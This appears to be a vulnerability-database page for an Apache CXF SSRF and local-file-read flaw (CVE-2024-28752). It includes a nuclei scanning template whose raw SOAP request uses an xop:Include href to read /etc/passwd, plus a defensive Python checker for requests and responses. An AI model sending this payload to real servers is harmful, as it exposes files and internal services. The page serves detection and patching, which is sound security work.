
Apache CXF < 4.0.4 - Aegis DataBinding SSRF / Local File Read

CVE-2024-28752
Verified

Description

Apache CXF before 4.0.4, 3.6.3 and 3.5.8 has a Server-Side Request Forgery (SSRF) vulnerability when using the Aegis DataBinding. The XOP Include mechanism in multipart SOAP requests can be abused to read local files or make server-side HTTP requests to arbitrary URLs. An attacker can use this to access sensitive internal resources.

Severity

High

CVSS Score

7.5

Exploit Probability

51%

Published Date

March 31, 2026

Template Author

maciejklimek

CVE-2024-28752.yaml
id: CVE-2024-28752

info:
  name: Apache CXF < 4.0.4 - Aegis DataBinding SSRF / Local File Read
  author: maciejklimek
  severity: high
  description: |
    Apache CXF before 4.0.4, 3.6.3 and 3.5.8 has a Server-Side Request Forgery (SSRF) vulnerability when using the Aegis DataBinding. The XOP Include mechanism in multipart SOAP requests can be abused to read local files or make server-side HTTP requests to arbitrary URLs. An attacker can use this to access sensitive internal resources.
  impact: |
    An attacker can read arbitrary files from the server and make server-side requests to internal services.
  remediation: Upgrade Apache CXF to version 4.0.4, 3.6.3, or 3.5.8 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28752
    - https://github.com/advisories/GHSA-qmgx-j96g-4428
    - https://github.com/ReaJason/CVE-2024-28752
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-28752
    epss-score: 0.50829
    epss-percentile: 0.979
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Apache CXF"
    fofa-query: body="Apache CXF"
  tags: cve,cve2024,apache,cxf,ssrf,lfi

http:
  - raw:
      - |
        POST /test HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/related; boundary=----nucleibound

        ------nucleibound
        Content-Disposition: form-data; name="1"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
           <soapenv:Header/>
           <soapenv:Body>
              <web:test>
                 <arg0>
        <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/passwd"></xop:Include></count>
        </arg0>
              </web:test>
           </soapenv:Body>
        </soapenv:Envelope>
        ------nucleibound--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Unmarshalling Error"

      - type: regex
        part: body
        regex:
          - "cm9vd[A-Za-z0-9+/=]+"

      - type: word
        part: content_type
        words:
          - "text/xml"
# digest: 4b0a00483046022100bc601ee7fddb4c398e39ad84a8d3ce414318a2629f13fe6c8eac6c4716938bd102210084d550ead5cc501a6e522ef60b4d1bdc29f01038dacbcf2e52c7d61e0fa8cbcd:922c64590222798bb761d5b6d8e72950
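As an added example, not part of the nuclei template above or of Apache CXF itself, the following Python script does two things a defender wants from this page: it applies the template's three matchers (with `matchers-condition: and`) to a response so it is clear what counts as a positive, and it inspects an incoming multipart SOAP request for any `xop:Include` whose `href` is not a `cid:` reference to another MIME part, which is the check a gateway or WAF in front of a CXF service would run while the upgrade is pending. The request body is the one from the template; the benign variant and the SOAP fault are constructed samples, and the fault's wording is modelled on the matchers rather than copied from a real CXF response.

```python
"""Request-side and response-side checks for the CVE-2024-28752 pattern.

Added example; not code from the nuclei template or from Apache CXF.
All sample messages below are constructed.
"""
import base64
import re
import xml.etree.ElementTree as ET
from typing import List, Optional
from urllib.parse import urlsplit

XOP_INCLUDE = "{http://www.w3.org/2004/08/xop/include}Include"

# XOP defines an Include href as a cid: URI naming another part of the same
# message. A file:, http: or other scheme never belongs in a legitimate request.
ALLOWED_HREF_SCHEMES = {"cid"}


def boundary_from_content_type(content_type: str) -> Optional[str]:
    """Extract the boundary parameter from a multipart Content-Type header."""
    m = re.search(r'boundary="?([^";,\s]+)"?', content_type, re.IGNORECASE)
    return m.group(1) if m else None


def multipart_part_bodies(body: str, boundary: str) -> List[str]:
    """Split a multipart body into each part's payload (part headers removed)."""
    payloads = []
    for chunk in body.split("--" + boundary):
        chunk = chunk.strip("\r\n")
        if not chunk or chunk == "--":  # preamble or closing delimiter
            continue
        # Part headers end at the first blank line; whatever follows is the payload.
        pieces = re.split(r"\r?\n\r?\n", chunk, maxsplit=1)
        payloads.append(pieces[1] if len(pieces) == 2 else pieces[0])
    return payloads


def xop_include_hrefs(xml_text: str) -> List[str]:
    """Return the href of every xop:Include element; [] if the part is not XML."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return []
    return [el.get("href", "") for el in root.iter(XOP_INCLUDE)]


def flagged_hrefs(content_type: str, body: str) -> List[str]:
    """List xop:Include hrefs whose scheme is not cid: (the request-side check)."""
    boundary = boundary_from_content_type(content_type)
    payloads = multipart_part_bodies(body, boundary) if boundary else [body]
    bad = []
    for payload in payloads:
        for href in xop_include_hrefs(payload.strip()):
            if urlsplit(href).scheme.lower() not in ALLOWED_HREF_SCHEMES:
                bad.append(href)
    return bad


def template_matchers_fire(content_type: str, body: str) -> bool:
    """Apply the template's three matchers joined by matchers-condition: and."""
    return (
        "text/xml" in content_type                       # part: content_type
        and "Unmarshalling Error" in body                # word matcher
        and re.search(r"cm9vd[A-Za-z0-9+/=]+", body) is not None  # base64 "root..."
    )


# Constructed sample request: the multipart body from the template above.
SAMPLE_CONTENT_TYPE = "multipart/related; boundary=----nucleibound"
SAMPLE_REQUEST_BODY = (
    "------nucleibound\r\n"
    'Content-Disposition: form-data; name="1"\r\n'
    "\r\n"
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
    'xmlns:web="http://service.namespace/">'
    "<soapenv:Header/><soapenv:Body><web:test><arg0><count>"
    '<xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" '
    'href="file:///etc/passwd"></xop:Include>'
    "</count></arg0></web:test></soapenv:Body></soapenv:Envelope>\r\n"
    "------nucleibound--\r\n"
)
# Constructed benign variant: a proper cid: reference to another MIME part.
BENIGN_REQUEST_BODY = SAMPLE_REQUEST_BODY.replace(
    "file:///etc/passwd", "cid:attachment-1@example.invalid"
)

# Constructed SOAP fault shaped like what the matchers look for: the word
# "Unmarshalling Error" plus base64 text that starts with "cm9vd" ("root").
LEAK_SAMPLE = base64.b64encode(b"root:x:0:0:root:/root:/bin/sh\n").decode()
SAMPLE_RESPONSE_BODY = (
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soap:Body><soap:Fault><faultcode>soap:Client</faultcode>"
    f"<faultstring>Unmarshalling Error: {LEAK_SAMPLE}</faultstring>"
    "</soap:Fault></soap:Body></soap:Envelope>"
)

if __name__ == "__main__":
    print("request flagged hrefs:", flagged_hrefs(SAMPLE_CONTENT_TYPE, SAMPLE_REQUEST_BODY))
    print("benign flagged hrefs: ", flagged_hrefs(SAMPLE_CONTENT_TYPE, BENIGN_REQUEST_BODY))
    print("response matches:     ", template_matchers_fire("text/xml;charset=UTF-8", SAMPLE_RESPONSE_BODY))
```

The request-side check is deliberately scheme-based rather than path-based: blocking only `file:` would still let an `http:` or `https:` href through, which is the SSRF half of the advisory, so anything that is not a `cid:` reference is rejected. A service that never uses MTOM/XOP can go further and reject any `xop:Include` at all.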

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
CVE-2024-28752
CWE ID:
CWE-918

References

https://nvd.nist.gov/vuln/detail/CVE-2024-28752
https://github.com/advisories/GHSA-qmgx-j96g-4428
https://github.com/ReaJason/CVE-2024-28752

Remediation Steps

Upgrade Apache CXF to 4.0.4, 3.6.3 or 3.5.8, or to a later release of the same branch.